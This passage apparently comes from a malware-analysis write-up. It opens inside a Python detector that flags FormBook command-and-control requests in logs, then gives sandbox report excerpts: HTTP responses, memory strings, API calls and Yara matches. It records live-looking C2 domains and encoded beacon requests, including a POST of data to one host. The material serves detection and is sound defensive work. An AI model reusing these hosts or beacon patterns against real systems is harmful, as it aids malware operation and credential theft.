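CHROME_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/131.0 Safari/537.36"

# Constructed log: the four malicious lines reuse the requests recorded in the report,
# the last two lines are benign controls that each share only part of the pattern.
SAMPLE_LOG = "\n".join("\t".join(r) for r in [
    ("2025-01-10T17:44:23+0100", "192.168.2.4", "GET",
     "http://www.wuyyv4tq.top/0qmw/?3fo=rJKpKBC&h0Z4uv=278+fPNRLmRxSvCH34hbLODYmABWu8vkjuqqbvjl/R4r9MC/xh0rLSqKPcdQtIyz70t8P1XMFdXw2YmeVp9Igz5U6icI9PUQLWv4eV+o4CclGEV4ym29rSk=", UA),
    ("2025-01-10T17:44:40+0100", "192.168.2.4", "POST", "http://www.313333.xyz/5jna/", UA,
     "h0Z4uv=l+uQF2GaIYZVgOSIluh9TLmYIM0QOTowdpVVbRWvl3khDRRYsCRWpeaiPLavxGa8KXIB5CJi7DClWANh55bgtKe3ToHwDWVf2yxDFyFI4aXVRsOfXIFONFkO96Dttzvp6YpYlHdlYaRDtcmJBptvjPgBjh7vcUXMjo4idlcl2UjalVqvTA30r/7z3DKdejjXpg=="),
    ("2025-01-10T17:44:48+0100", "192.168.2.4", "GET",
     "http://www.313333.xyz/5jna/?h0Z4uv=o8GwGASYBJt/nb/piMB5DNiJPc8rJicYda1NcmeQznd2DA1k1E5AtP7RU4WuyFuLPAN95z5B1yv6cgM9wMfZloOraKLvaksg7S1pHUhIybvdcNjqXcBCCD0=&3fo=rJKpKBC", UA),
    ("2025-01-10T17:45:18+0100", "192.168.2.4", "GET",
     "http://www.mzkd6gp5.top/0hqe/?h0Z4uv=DKA1iVPcoZUjyp2kMNYgPydN8TVlv2BCRXxU2Kub3rtTiJbt+pfDiXzRopvp7VMLzDHcJo8PeW6VBgWmqyKjijxSdggTsAG5c4hPlmGpc/Wen6gVL7B2F3s=&3fo=rJKpKBC", UA),
    ("2025-01-10T17:46:01+0100", "192.168.2.7", "GET", "http://www.example.com/news/?id=1234&page=2", CHROME_UA),
    ("2025-01-10T17:46:05+0100", "192.168.2.7", "GET", "http://intranet.example/docs/?id=42&v=3", UA),
])

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
    print(hosts_by_tag(scan(SAMPLE_LOG)))
```

The two controls show why all three traits are required together: /news/ and /docs/ both satisfy the four-character path test, and the second control even carries the legacy User-Agent, but neither has the long unencoded base64 value. The pivot ties www.wuyyv4tq.top, www.313333.xyz and www.mzkd6gp5.top to the same tag rJKpKBC, which is the kind of link an analyst wants when deciding which of the many queried domains belong to one FormBook build.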
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 403 Forbidden
  Server: nginx
  Date: Fri, 10 Jan 2025 16:44:23 GMT
  Content-Type: text/html
  Content-Length: 548
  Connection: close
  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Fri, 10 Jan 2025 16:45:11 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  cf-cache-status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GOlxFpRyH296IizPNQlSLUy2hO3Pl39IMyl%2FSWzgwbBXYVZr%2BegyCwIvurCcv%2BUDMNN3zUJQyxYuOBW0C1OGxIFttFwy0L%2FDTipon24y9w9FfZ5jZm8g0Yps4tfqvUYUDQP%2F"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8ffe22cdf9d87d0e-EWR
  Content-Encoding: gzip
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=2048&min_rtt=2048&rtt_var=1024&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=802&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a
  Data Ascii: (gzip-compressed chunked body, 0xa7 bytes; not printable)
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Fri, 10 Jan 2025 16:45:13 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  cf-cache-status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BSiuZvHVQdQzd0pOY1uvF7RLdUWTO9zkP8mUnXKVc5PnnqMf7IZZ0ZXdiPSJ%2FxpO9smrLnXZiBCmR3GNLXRWcIThfuHJ0f5Vu%2FmH6mqEaoDioYJOs3l0ODf0Q37Ttft4uPoW"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8ffe22de482f42d2-EWR
  Content-Encoding: gzip
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1699&rtt_var=849&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=822&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
  Data Ascii: (gzip-compressed chunked body, 0xa7 bytes followed by the terminating zero-length chunk; not printable)
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Fri, 10 Jan 2025 16:45:16 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  cf-cache-status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vrZZp2tDNMoTseK6nSnDiJTFQaFn%2Fo3cDfrQKiXcvKT2dzH37rHp1mgSFGgNXzWZqITT42gafw%2BNBCdbFaG6yHSYnWSJHiObD6NBdg7LSwIee0iGNpvKaPR21vgg3XZp0Vi%2B"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8ffe22eecacf43ee-EWR
  Content-Encoding: gzip
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=34229&min_rtt=34229&rtt_var=17114&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10904&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a
  Data Ascii: (gzip-compressed chunked body, 0xa7 bytes; not printable)
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Fri, 10 Jan 2025 16:45:18 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  cf-cache-status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q2ASWDf1zmEQ5OpbBMi5%2BQOuPlgyojZg1ufAF95wZ71HzGnpDMC1DHkQLy2%2Bgrf0uPNELC44iiEURriAHZd9Pc0IgObhRhruoZJ%2BHCDbEvqjm5ygOxvhFiPZ4SjEXGVudrNY"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8ffe22fe3ae443ee-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1950&min_rtt=1950&rtt_var=975&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=533&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20
  Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly
                Source: ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)
                Source: ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)
                Source: sUcUmdUxGfN.exe, 00000007.00000002.3015655468.00000000014B4000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.mzkd6gp5.top
                Source: sUcUmdUxGfN.exe, 00000007.00000002.3015655468.00000000014B4000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.mzkd6gp5.top/0hqe/
                Source: ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72
                Source: ROUTE.EXE, 00000006.00000002.3014722953.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: ROUTE.EXE, 00000006.00000002.3014722953.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: ROUTE.EXE, 00000006.00000002.3014722953.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: ROUTE.EXE, 00000006.00000002.3014722953.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: ROUTE.EXE, 00000006.00000002.3014722953.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: ROUTE.EXE, 00000006.00000003.2458031272.0000000007CA0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.west.cn/cloudhost/
                Source: ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.west.cn/jiaoyi/
                Source: ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.west.cn/services/domain/
                Source: ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.west.cn/services/mail/
                Source: ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.west.cn/services/webhosting/
                Source: ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.west.cn/ykj/view.asp?domain=313333.xyz
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DEEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DEED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00DDAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00E09576 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                E-Banking Fraud

                Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000001.00000002.2268978745.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3014344224.0000000002A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3015748227.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3015655468.0000000001430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3014639405.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.2269397258.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.2268552454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3015861642.00000000048D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: qlG7x91YXH.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: qlG7x91YXH.exe, 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_4a218515-1
                Source: qlG7x91YXH.exe, 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_126e9829-0
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D73170 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00E0A2D7 NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00E087B2 NtdllDialogWndProc_W,CallWindowProcW
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00E08AAA NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D88BA4 NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00E08FC9 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00E090A1 SendMessageW,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D890A7 NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00D89052 NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00E0911E DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00E093CB NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00E09380 NtdllDialogWndProc_W
                Source: C:\Users\user\Desktop\qlG7x91YXH.exe | Code function: 0_2_00E09400 ClientToScreen,NtdllDialogWndProc_W
